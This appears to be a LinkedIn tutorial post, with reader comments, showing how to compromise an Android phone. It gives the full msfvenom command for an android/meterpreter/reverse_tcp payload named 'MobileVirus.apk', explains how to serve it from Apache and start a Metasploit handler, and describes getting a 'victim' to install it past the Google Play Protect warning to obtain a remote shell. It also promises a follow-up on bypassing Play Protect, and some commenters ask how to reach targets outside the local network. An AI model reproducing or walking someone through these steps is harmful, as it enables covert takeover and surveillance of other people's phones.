Android Hacking - Part 01
MUHAMMAD MOIZ UD DIN RAFAY
CC | CEH | CS & DF | Google Cybersecurity Professional| Cybersecurity Engineer | Ethical Hacker | Penetration Tester | Wazuh Expert | Cybersecurity Instructor Trainer | Network Security Specialist
I am writing my first article on Android Hacking in this article we are going to exploit android mobile with simple msfvenom payload.
Here we go....
Step 01
In first step we have to find out what is our IP address (IPv4), in Kali Linux terminal i type command "ifconfig wlan0" to find-out current IP address of my attacker machine (Kali Linux).
If you are using Kali Linux in VMware or VirtualBox then your interface will be "eth0" so you can find your IP address with "ifconfig eth0".
Step 02
In 2nd step we need to create android payload with msfvenom
Command: sudo msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=42474 -o MobileVirus.apk
Need to Know:
Step 03
Transfer payload (MobileVirus.apk) file to your apache2 folder & then start your apache2 server
Command: sudo cp MobileVirus.apk /var/www/html
Command: sudo service apache2 start (Start Apache2 Server)
Need to Know
Step 04
I am going to launch metasploit-framework to create handler
Command: sudo msfconsole (console of Metasploit-Frmaework)
领英推荐
Setting Handler
Step 05
Installing payload into victim mobile
Type IP address of attacker machine (Kali Linux) into victim mobile
Download the application (MobileVirus.apk)
After download you can install application (MobileVirus.apk)
Google Play Protect Warning: you can click on install anyway to proceed with installation.
Note: i will write on article on "How to Bypass Google Play Protect" later in this series.
When application (MobileVirus.apk) installed click on open
We Got Android
When application is opened we get back reverse connection
Type the command: "sysinfo" to check your victim mobile information.
Note: if you find any mistake or error in typing please inform me, you can also ask question.
---------------------------------------END----------------------------------------
--
3 个月ip address is not opening in my mobile
--
7 个月Is port forwarding required for this? its for targets that out of u r network
Cybersecurity Specialist | Computer Science Graduate | Network Diploma Holder | IT & Penetration Testing Expert
10 个月Great article.. I need a mentor in android...
MCA @RVITM | Cybersecurity Enthusiast | Try Hack Me Top 08% | ISC2 CC Candidate |
11 个月Sir, I have 2 questions. 1) Sir I have followed the exact process but it didn't get installed on the mobile. Error Message was like App Not Installed. The only thing I have done differently is transfer the APK file through USB and not through the localhost site. So what changes do I have to make to make that APK file install properly? 2) Is port forwarding required for this?
--
1 年Please add part 2